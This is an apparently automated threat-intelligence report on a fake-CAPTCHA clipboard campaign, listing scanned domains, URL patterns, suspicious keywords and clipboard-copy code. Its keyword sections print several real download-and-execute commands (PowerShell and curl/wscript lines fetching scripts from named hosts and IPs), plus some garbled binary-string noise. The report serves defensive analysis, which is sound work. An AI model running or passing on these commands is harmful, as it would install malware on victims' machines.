← Back to Analysis

Emerging ClickGrab Campaign: Advanced Analysis of 2026-05-13 Attack Patterns

📅 Published: May 13, 2026 👨‍💻 Author: ClickGrab Threat Intelligence Team 📖 12 min read
100Sites
22%Detection
2PS Downloads

ClickGrab Threat Analysis Report - 2026-05-13

Generated on 2026-05-13 01:58:57

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 22
  • Unique domains encountered: 1,522
  • Total URLs extracted: 7,213
  • PowerShell download attempts: 2
  • Clipboard manipulation instances: 102

Domain Analysis

Most Frequently Encountered Domains

  • bharatnamkeens.com: 405 occurrences
  • www.maheshwaree.com: 320 occurrences
  • twitch.co.com: 318 occurrences
  • 98.70.13.131: 309 occurrences
  • fudgeshop.com.au: 265 occurrences
  • picsera.com: 227 occurrences
  • 18.176.47.246: 218 occurrences
  • adturekorea.co.kr: 214 occurrences
  • scillarodriguez.com: 199 occurrences
  • www.ccera-icar.org: 178 occurrences
  • senevie.com: 174 occurrences
  • devblog.ezeelogin.com: 132 occurrences
  • www.dorper.com.au: 125 occurrences
  • picsera.sirv.com: 121 occurrences
  • 104.199.248.167: 72 occurrences

URL Pattern Analysis

reCAPTCHA imagery

8 occurrences across 5 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 times)
  • https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm (1 times)

Font resources

79 occurrences across 64 distinct URLs

  • https://fonts.gstatic.com (6 times)
  • https://fonts.googleapis.com (5 times)
  • https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
  • https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620 (2 times)
  • https://use.fontawesome.com/releases/v5.6.3/css/all.css (2 times)
  • ...and 59 more distinct URLs

CDN hosted scripts

6 occurrences across 6 distinct URLs

  • https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 times)
  • https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 times)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
  • https://framework-gb.cdn.gob.mx/assets/styles/main.css?ver=1.0.0 (1 times)
  • https://framework-gb.cdn.gob.mx/gobmx.js?ver=1.0 (1 times)
  • ...and 1 more distinct URLs

Google resources

118 occurrences across 62 distinct URLs

  • https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png (32 times)
  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (13 times)
  • https://fonts.googleapis.com (5 times)
  • https://www.googletagmanager.com/gtm.js?id= (4 times)
  • https://www.google (3 times)
  • ...and 57 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 528 (112 unique)

Keyword Categories

Social Engineering

46 unique keywords

  • verification-id
  • exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
  • captchaSiteKey
  • Verify You Are Human
  • Captcha
  • captcha-js
  • To better prove you are not a robot
  • Verification Hash
  • Command line: [2]Removing applicationsRemoving filesRemoving foldersFile: [1], Section: [2], Key: [3], Value: [4]Removing INI file entriesRemoving ODBC componentsRemoving system registry valuesKey: [1], Name: [2]Removing shortcutsFile: [1], Folder: [2]Registering modulesRemoving backup filesRollbackRemoving moved filesRollbackCleanupInitializing ODBC directoriesStarting servicesStopping servicesUnpublishing Qualified ComponentsUnpublishing product informationThe wizard was interrupted before [ProductName] could be completely installed.UnmoveFilesUnpublishing product featuresUnregister class serversCreating IIS Virtual Roots...UnpublishProductAppId: [1]{{, AppType: [2]}}Unregistering COM+ Applications and ComponentsUnregistering extension serversUnregistering fontsUnregistering MIME infoUnregistering program identifiersUnregistering type librariesWriting INI file valuesKey: [1], Name: [2], Value: [3]Writing system registry valuesAdvertising applicationRemoving IIS Virtual Roots...caCreateVRoots{&TahomaBold10}Welcome to the InstallShield Wizard for [ProductName]caRemoveVRoots1ISCHECKFORPRODUCTUPDATESAllUsersApplicationUsersNoAgreeToLicenseChange_IsMaintenanceCloseRestartRestartManagerOptionTypicalSetupType_IsSetupTypeMinDisplay_IsBitmapDlg{3B59CBE2-36D2-452F-B123-685CEEEB7456}[1]ALLUSERSARPPRODUCTICON.exeARPPRODUCTICON30DWUSINTERVALCE8B87EF8EFC67DF99ACF778AEBB978FDEEB808FFEAB07BFCEBC872FEE9BD088CECCA08FC9ACDWUSLINKTahoma8DefaultUIFontInstallShield for Windows InstallerDialogCaptionMinimalDisplayNameCustomThe InstallShield(R) Wizard will create a server image of [ProductName] at a specified network location. To continue, click Next.DisplayNameMinimalCosting COM+ application: [1]DisplayNameTypicalSetupErrorErrorDialog100INSTALLLEVEL0ISVROOT_PORT_NOInstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_COSTUninstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_INSTALLA newer version of this application is already installed on this computer. If you wish to install this version, please uninstall the newer version first. Click OK to exit the wizard.IS_COMPLUS_PROGRESSTEXT_UNINSTALLReplacing %s with %s in %s...IS_PREVENT_DOWNGRADE_EXITCosting XML files...IS_PROGMSG_TEXTFILECHANGS_REPLACECreating XML file %s...IS_PROGMSG_XML_COSTINGPerforming XML file changes...IS_PROGMSG_XML_CREATE_FILERemoving XML file %s...IS_PROGMSG_XML_FILESRolling back XML file changes...IS_PROGMSG_XML_REMOVE_FILEUpdating XML file %s...IS_PROGMSG_XML_ROLLBACK_FILESYour Company NameIS_PROGMSG_XML_UPDATE_FILEIS_SQLSERVER_AUTHENTICATIONsaIS_SQLSERVER_USERNAMEARInstallChoiceCreating application pool %sManufacturer12345<###-%%%%%%%>@@@@@PIDTemplateCreating application Pools...PROGMSG_IIS_CREATEAPPPOOLCreating IIS virtual directory %sPROGMSG_IIS_CREATEAPPPOOLSCreating IIS virtual directories...PROGMSG_IIS_CREATEVROOTCreating web service extensionPROGMSG_IIS_CREATEVROOTSCreating web service extensions...PROGMSG_IIS_CREATEWEBSERVICEEXTENSIONCreating IIS website %sPROGMSG_IIS_CREATEWEBSERVICEEXTENSIONSCreating IIS websites...PROGMSG_IIS_CREATEWEBSITEExtracting information for IIS virtual directories...PROGMSG_IIS_CREATEWEBSITESExtracted information for IIS virtual directories...PROGMSG_IIS_EXTRACTRemoving application po !"$0/& 2  &,!  2 & 
  • I am not a robot
  • ...and 36 more

Obfuscation Indicators

11 unique keywords

  • exec()QApplication::%s: Please instantiate the QApplication object first%L1WARNING: QApplication was not created in the main() thread.�sgqAppNameQCoreApplication: Application event filter cannot be in a different thread.QCoreApplication: Object event filter cannot be in a different thread.QCoreApplication::applicationFilePath: Please instantiate the QApplication object firstQCoreApplication::argc: Please instantiate the QApplication object firstQCoreApplication::argv: Please instantiate the QApplication object firstQCoreApplication::enter_loop: Must be called from the main threadenter_looploopLevelQCoreApplication::notify: Unexpected null receiverinstallTranslatorQCoreApplication::applicationDirPath: Please instantiate the QApplication object firstremoveTranslatorQCoreApplication::postEvent: Unexpected null receiverQCoreApplication::sendPostedEvents: Cannot send posted events for objects in another threadQCoreApplication::exit_loop: Must be called from the main threadexit_loop<�g��g��g��gP-g�g� g��g��g��g��g��g g� g�� g-testability-graphicssystem-session-style-style=-widgetcount-stylesheet-reverse-qdebug-qdevelQCoreApplication::arguments: Please instantiate the QApplication object firstQT_PLUGIN_PATHQCoreApplication::exec: The event loop is already running%s::exec: Must be called from the main threadexec��g�3g��g�3g �g4gl�g�4g::constenum class struct char shortulong longuint intunsignedconst onstQtvoidQMetaMethod::invoke: Dead lock detected in BlockingQueuedConnection: Receiver is %s(%p)
  • eval(
  • eval(script)
  • eval("clearTimeout(timeOut"+uid+")")
  • eval("clearTimeout(timeIn"+uid+")")
  • eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)
  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
  • eval(frameContents)
  • Command for the linkW!Set the Show Command for the linkWTell the link to resolve itselfWWW!Get the IconLocation for the linkW!Set the IconLocation for the linkW!Tell the link to save the changesWISetupStringTable InterfaceWWWGet string from nameWWget_SuiteCallbackWput_SuiteCallbackWget_SuiteExtensionput_SuiteExtensionICommand line argument passed to setup.exe when it's launched after rebootW*Set a shortcut property for an opened link7Retrieve any failures from applying shortcut propertiesWWW0Set a shortcut property for Run As AdministratorWW3Retrieve shortcut property for Run As AdministratorWWW.Interface ISetupDynamicLinkedLibraryControllerInstallShield LogServices ClassWWWISetupLogService Interface8Opens the Log Database from the specified Storage objectWW:Creates a new Log Database on the specified Storage object*Opens the Log Database in a read-only modeISetupLogService2 InterfaceWWWSetupMainWindow ClassWISetupMainWindow InterfaceWindow caption Window handleWShows/Hides wait cursorWWW Create windowWDestroy windowISetupWindowText Interfaceproperty Color property TextW
  • ...and 1 more

System Commands

33 unique keywords

  • exec(ua) != null){rv = parseFloat(RegExp.$1);}}else if (n.appName == "Netscape"){rv = 11;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != null){rv = parseFloat(RegExp.$1);}}}return rv;}})(window, document, navigator)
  • POWerShEll
  • wscript
  • Exec format errorArg list too longNo such device or addressInput/output errorInterrupted function callNo such processNo such file or directoryOperation not permittedNo error: : Visual C++ CRT: Not enough memory to complete call to strerror.Visual C++ CRT: Not enough memory to complete call to strerror. /c TMP /c TMPccs=UTF-8UTF-16LEUNICODEccs=UTF-8UTF-16LEUNICODEX������<1�
  • const command =
  • Command key on Mac, Win key on other platforms.
  • cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;";`
  • Invoke-WebRequest
  • command =powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile \"%temp%\d.bat\" -UseBasicParsing; Start-Process \"%temp%\d.bat\"";
  • CMD
  • ...and 23 more

Verification Text

3 unique keywords

  • Hidden
  • ray id
  • hidden

Technical Terms

19 unique keywords

  • Ray ID
  • WinHttpRequest
  • bitmap
  • XMLHTTP
  • WebClient
  • You will observe
  • responseText
  • .ps1
  • VirtualAlloc
  • odyssey
  • ...and 9 more

Most Frequent Keywords

  • hidden: 45 occurrences
  • robot: 39 occurrences
  • Robot: 29 occurrences
  • failed_to_retrieve: 21 occurrences
  • verification: 20 occurrences
  • CAPTCHA: 18 occurrences
  • Verification: 17 occurrences
  • CAPTCHA Verification: 16 occurrences
  • I am not a robot: 16 occurrences
  • You will observe: 16 occurrences
  • verification-id: 16 occurrences
  • To better prove you are not a robot: 16 occurrences
  • Verification ID: 15 occurrences
  • Ray ID: 14 occurrences
  • Checking if you are human: 14 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification

Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, Captcha, captcha-js, CaptchaError

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • DisplayNameTypicalSetupErrorErrorDialog100INSTALLL...
  • ProxyAuthenticationRequiredError
  • bvDynamicImageObserverOptions=
  • exeARPPRODUCTICON30DWUSINTERVALCE8B87EF8EFC67DF99A...
  • CREATEWEBSITEExtracting

Clipboard Manipulation Analysis

Detected clipboard manipulation in 102 instances.

Document.Execcommand Copy

Found in 42 snippets (41.2% of clipboard code)

Examples:

try { document.execCommand('copy')

document.execCommand("copy")

document.execCommand('copy')

Textarea Manipulation

Found in 45 snippets (44.1% of clipboard code)

Examples:

tListener("click", function () { const textarea = document.createElement('textarea'

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

ng is the safe placeholder above const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.